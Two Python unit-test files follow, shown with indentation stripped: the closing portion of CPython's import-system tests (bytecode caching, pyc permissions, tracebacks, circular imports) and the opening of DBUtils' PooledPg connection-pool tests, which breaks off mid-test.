# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w") as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(16)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = code.replace(co_consts=tuple(constants))
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_parentless_import_shadowed_by_global(self):
# Test as if this were done from the REPL where this error most commonly occurs (bpo-37409).
script_helper.assert_python_failure('-W', 'ignore', '-c',
"foo = 1; from . import foo")
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
test.support.rmtree(self.tagged)
test.support.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(test.support.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
test.support.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(test.support.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@test.support.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
Because of the peculiarities of the need of this function, the tests are
knowingly whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = True;
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = False;
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w") as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
def test_binding(self):
try:
import test.test_import.data.circular_imports.binding
except ImportError:
self.fail('circular import with binding a submodule to a name failed')
def test_crossreference1(self):
import test.test_import.data.circular_imports.use
import test.test_import.data.circular_imports.source
def test_crossreference2(self):
with self.assertRaises(AttributeError) as cm:
import test.test_import.data.circular_imports.source
errmsg = str(cm.exception)
self.assertIn('test.test_import.data.circular_imports.source', errmsg)
self.assertIn('spam', errmsg)
self.assertIn('partially initialized module', errmsg)
self.assertIn('circular import', errmsg)
def test_circular_from_import(self):
with self.assertRaises(ImportError) as cm:
import test.test_import.data.circular_imports.from_cycle1
self.assertIn(
"cannot import name 'b' from partially initialized module "
"'test.test_import.data.circular_imports.from_cycle1' "
"(most likely due to a circular import)",
str(cm.exception),
)
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
test_pooled_pg.py
|
"""Test the PooledPg module.
Note:
We don't test performance here, so the test does not predicate
whether PooledPg actually will help in improving performance or not.
We also assume that the underlying SteadyPg connections are tested.
Copyright and credit info:
* This test was contributed by Christoph Zwerschke
"""
import unittest
from . import mock_pg # noqa
from dbutils.pooled_pg import PooledPg, InvalidConnection, TooManyConnections
class TestPooledPg(unittest.TestCase):
def test_version(self):
from dbutils import __version__, pooled_pg
self.assertEqual(pooled_pg.__version__, __version__)
self.assertEqual(PooledPg.version, __version__)
def test_create_connection(self):
pool = PooledPg(
1, 1, 0, False, None, None, False,
'PooledPgTestDB', user='PooledPgTestUser')
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 1)
self.assertTrue(hasattr(pool, '_maxusage'))
self.assertIsNone(pool._maxusage)
self.assertTrue(hasattr(pool, '_setsession'))
self.assertIsNone(pool._setsession)
self.assertTrue(hasattr(pool, '_reset'))
self.assertFalse(pool._reset)
db_con = pool._cache.get(0)
pool._cache.put(db_con, 0)
from dbutils.steady_pg import SteadyPgConnection
self.assertTrue(isinstance(db_con, SteadyPgConnection))
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertTrue(hasattr(db, '_con'))
self.assertEqual(db._con, db_con)
self.assertTrue(hasattr(db, 'query'))
self.assertTrue(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
self.assertTrue(hasattr(db, '_maxusage'))
self.assertEqual(db._maxusage, 0)
self.assertTrue(hasattr(db, '_setsession_sql'))
self.assertIsNone(db._setsession_sql)
self.assertTrue(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assertTrue(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
db.query('select test')
self.assertEqual(db.num_queries, 1)
pool = PooledPg(1)
db = pool.connection()
self.assertTrue(hasattr(db, 'dbname'))
self.assertIsNone(db.dbname)
self.assertTrue(hasattr(db, 'user'))
self.assertIsNone(db.user)
self.assertTrue(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
pool = PooledPg(0, 0, 0, False, 3, ('set datestyle',),)
self.assertEqual(pool._maxusage, 3)
self.assertEqual(pool._setsession, ('set datestyle',))
db = pool.connection()
self.assertEqual(db._maxusage, 3)
self.assertEqual(db._setsession_sql, ('set datestyle',))
def test_close_connection(self):
pool = PooledPg(
0, 1, 0, False, None, None, False,
'PooledPgTestDB', user='PooledPgTestUser')
db = pool.connection()
self.assertTrue(hasattr(db, '_con'))
db_con = db._con
from dbutils.steady_pg import SteadyPgConnection
self.assertTrue(isinstance(db_con, SteadyPgConnection))
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(db.num_queries, 0)
db.query('select test')
self.assertEqual(db.num_queries, 1)
db.close()
self.assertRaises(InvalidConnection, getattr, db, 'num_queries')
db = pool.connection()
self.assertTrue(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assertTrue(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
self.assertEqual(db.num_queries, 1)
db.query('select test')
self.assertEqual(db.num_queries, 2)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 1)
self.assertEqual(pool._cache.get(0), db_con)
def test_min_max_cached(self):
pool = PooledPg(3)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 6)
pool = PooledPg(3, 4)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 4)
pool = PooledPg(3, 2)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(4)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(4):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
pool = PooledPg(2, 5)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 2)
cache = [pool.connection() for i in range(10)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(10):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 5)
def test_max_connections(self):
from dbutils.pooled_pg import TooManyConnections
pool = PooledPg(1, 2, 3)
self.assertEqual(pool._cache.qsize(), 1)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(0, 1, 1, False)
self.assertEqual(pool._blocking, 0)
self.assertEqual(pool._cache.qsize(), 0)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
del db
del cache
pool = PooledPg(1, 2, 1)
self.assertEqual(pool._cache.qsize(), 1)
cache = [pool.connection()]
self.assertEqual(pool._cache.qsize(), 0)
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(3, 2, 1, False)
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(len(cache), 3)
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(1, 1, 1, True)
self.assertEqual(pool._blocking, 1)
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
def connection():
pool.connection().query('set thread')
from threading import Thread
thread = Thread(target=connection)
thread.start()
thread.join(0.1)
self.assertTrue(thread.is_alive())
self.assertEqual(pool._cache.qsize(), 0)
session = db._con.session
self.assertEqual(session, [])
del db
thread.join(0.1)
self.assertFalse(thread.is_alive())
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(session, ['thread'])
del db
def test_one_thread_two_connections(self):
pool = PooledPg(2)
db1 = pool.connection()
for i in range(5):
db1.query('select test')
db2 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
for i in range(7):
db2.query('select test')
self.assertEqual(db1.num_queries, 5)
self.assertEqual(db2.num_queries, 7)
del db1
db1 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assertTrue(hasattr(db1, 'query'))
for i in range(3):
db1.query('select test')
self.assertEqual(db1.num_queries, 8)
db2.query('select test')
self.assertEqual(db2.num_queries, 8)
def test_three_threads_two_connections(self):
pool = PooledPg(2, 2, 2, True)
try:
from queue import Queue, Empty
except ImportError: # Python 2
from Queue import Queue, Empty
queue = Queue(3)
def connection():
try:
queue.put(pool.connection(), 1, 1)
except TypeError:
queue.put(pool.connection(), 1)
from threading import Thread
for i in range(3):
Thread(target=connection).start()
try:
db1 = queue.get(1, 1)
db2 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
db2 = queue.get(1)
db1_con = db1._con
db2_con = db2._con
